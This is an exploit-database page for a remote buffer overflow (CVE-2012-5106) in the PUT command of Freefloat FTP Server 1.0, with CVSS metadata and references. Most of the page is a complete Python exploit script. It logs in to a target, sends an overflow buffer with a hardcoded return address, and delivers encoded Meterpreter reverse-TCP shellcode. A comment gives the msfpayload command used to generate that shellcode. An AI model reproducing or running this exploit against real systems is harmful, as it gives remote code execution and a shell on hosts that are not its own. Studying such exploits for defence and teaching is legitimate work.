Freefloat FTP Server PUT Command Buffer Overflow

2014.06.21
Credit: Gimppy042
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python ########################### # Title************************Freefloat FTP Server PUT Command Buffer Overflow # Discovered and Reported******22nd of September, 2012 # Discovered/Exploited By******Jacob Holcomb/Gimppy042 # Software Vendor**************http://www.freefloat.com/ # CVE for PUT Overflow*********CVE-2012-5106 # Exploit/Advisory*************http://infosec42.blogspot.com/2012/09/freefloatftp-10-put-buffer-overflow.html # Software*********************Freefloat FTP Server Version 1.0 # Tested Platform**************Windows XP Professional SP2 # Date*************************22/09/2012 # #Credits for original Buffer Overflow discovery in FreeFloatFTP 1.0 go to #Veerendra G.G of SecPod Technologies #For first discovering that FreeFloat FTP had several FTP commands that could cause a Stack Based overflow condition. # #In my disclosure to FreeFloat, I reported my discovery and notified them that other exploits for various FTP commands supported by #the FreeFloat FTP existed on the internet just to be assured they knew as SecPod reported their findings last year. They responded and #acknowledged my discovered vulnerability along with the others in the wild. They also stated the following... #"In fact we have issued an end of life for the software and it will be taken off-line October 1st." # #PS - This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz ######################################################################################################################################### import socket def Overflow(): print "[!!!!] INSTRUCTIONS:\n\n[*] Use the commeneted out msfpayload command to generate shellcode for your environment and replace the shellcode variable with your shellcode\n[*] Make sure you start a proper listener if using reverse shell\n\n" server = raw_input("\n[*] Please enter the IP address of a server you wish to exploit:\n\n>") port = int(21) user = raw_input("\n[*] Please enter a username for the FTP server:\n\n>") password = raw_input("\n[*] Please enter a password for username:\n\n>") cmd = "put " nopsled = "\x90" * 32 junk = "\x90" * 247 junk2 = "\x90" * 65 ret_addr = "\xED\x1E\x94\x7C" #7C941EED - FFE4 - JMP ESP <NTDLL.dll XP sp2> - Dont forget little endian! #msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=2107 EXITFUNC=thread R | msfencode -c 1 -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20\x7b" R shellcode = ("\xdb\xc3\xd9\x74\x24\xf4\xbd\x06\xbd\x1f\xaa\x5f\x33\xc9" + "\xb1\x49\x31\x6f\x19\x83\xef\xfc\x03\x6f\x15\xe4\x48\xe3" + "\x42\x61\xb2\x1c\x93\x11\x3a\xf9\xa2\x03\x58\x89\x97\x93" + "\x2a\xdf\x1b\x58\x7e\xf4\xa8\x2c\x57\xfb\x19\x9a\x81\x32" + "\x99\x2b\x0e\x98\x59\x2a\xf2\xe3\x8d\x8c\xcb\x2b\xc0\xcd" + "\x0c\x51\x2b\x9f\xc5\x1d\x9e\x0f\x61\x63\x23\x2e\xa5\xef" + "\x1b\x48\xc0\x30\xef\xe2\xcb\x60\x40\x79\x83\x98\xea\x25" + "\x34\x98\x3f\x36\x08\xd3\x34\x8c\xfa\xe2\x9c\xdd\x03\xd5" + "\xe0\xb1\x3d\xd9\xec\xc8\x7a\xde\x0e\xbf\x70\x1c\xb2\xc7" + "\x42\x5e\x68\x42\x57\xf8\xfb\xf4\xb3\xf8\x28\x62\x37\xf6" + "\x85\xe1\x1f\x1b\x1b\x26\x14\x27\x90\xc9\xfb\xa1\xe2\xed" + "\xdf\xea\xb1\x8c\x46\x57\x17\xb1\x99\x3f\xc8\x17\xd1\xd2" + "\x1d\x21\xb8\xba\xd2\x1f\x43\x3b\x7d\x28\x30\x09\x22\x82" + "\xde\x21\xab\x0c\x18\x45\x86\xe8\xb6\xb8\x29\x08\x9e\x7e" + "\x7d\x58\x88\x57\xfe\x33\x48\x57\x2b\x93\x18\xf7\x84\x53" + "\xc9\xb7\x74\x3b\x03\x38\xaa\x5b\x2c\x92\xc3\xf1\xd6\x75" + "\x2c\xad\xd8\xf0\xc4\xaf\xda\xf2\x2f\x26\x3c\x68\x40\x6e" + "\x96\x05\xf9\x2b\x6c\xb7\x06\xe6\x08\xf7\x8d\x04\xec\xb6" + "\x65\x61\xfe\x2f\x86\x3c\x5c\xf9\x99\xeb\xcb\x06\x0c\x17" + "\x5a\x50\xb8\x15\xbb\x96\x67\xe6\xee\xac\xae\x72\x51\xdb" + "\xce\x92\x51\x1b\x99\xf8\x51\x73\x7d\x58\x02\x66\x82\x75" + "\x36\x3b\x17\x75\x6f\xef\xb0\x1d\x8d\xd6\xf7\x82\x6e\x3d" + "\x06\xff\xb8\x78\x8c\x09\xcf\x68\x4c") #Fuzz Buffer #buffer = "PUT " + "\x90" * 720 #Exploit Buffer buffer = cmd + junk + ret_addr + nopsled + shellcode + junk2 print "\n[*] Sending payload in attempt to overflow buffer\n[*] Your payload size is %s\n" % len(buffer) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server,port)) data = s.recv(1024) print "[*] %s" %data s.send("user " + user + "\r\n") data = s.recv(1024) print "[*] %s" %data s.send("pass " + password + "\r\n") data = s.recv(1024) print "[*] %s" %data s.send(buffer+"\r\n") s.close() print "\nData was sent. Enjoy your shell\n" except: print "\n\n[!!!!] There was an error connecting to the server and sending your buffer[!!!!] Please check the following...\n\n[*] Supplied IP address\n[*] Username and Password\n[*] Is your target is online and running FreeFloat FTP server\n\n" def main(): print "\n\n# Title************************Freefloat FTP Server PUT Command Buffer Overflow\n# Discovered and Reported******22nd of September, 2012\n# Discovered/Exploited By******Jacob Holcomb/Gimppy042\n# Software Vendor**************http://www.freefloat.com/\n# CVE for PUT Overflow*********CVE-2012-510\n# Exploit/Advisory*************http://infosec42.blogspot.com/\n# Software*********************Freefloat FTP Server Version 1.0\n# Tested Platform**************Windows XP Professional SP2\n# Date*************************22/09/2012\n\n" contin = str(None) while contin != "yes": contin = raw_input("\n[*] Please review the security advisory before proceeding to affirm this exploit is for your target[*]\nWould you like to continue?\n\n>") if contin == "no": break elif contin == "yes": break elif contin != "yes" or "no": print "\n\n[*] You responded with %s. Please respond with yes or no!\n\n"% contin if contin == "yes": Overflow() elif contin == "no": print "\n[!!!!] Hmmm..Guess you downloaded the wrong exploit...Back to scanning and enumeration [!!!!]\n" #Top-level script environment if __name__ == "__main__": main()

References:

http://www.exploit-db.com/exploits/22351
http://infosec42.blogspot.com/2012/09/freefloatftp-10-put-buffer-overflow.html
http://www.osvdb.org/88358
http://xforce.iss.net/xforce/xfdb/79810


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top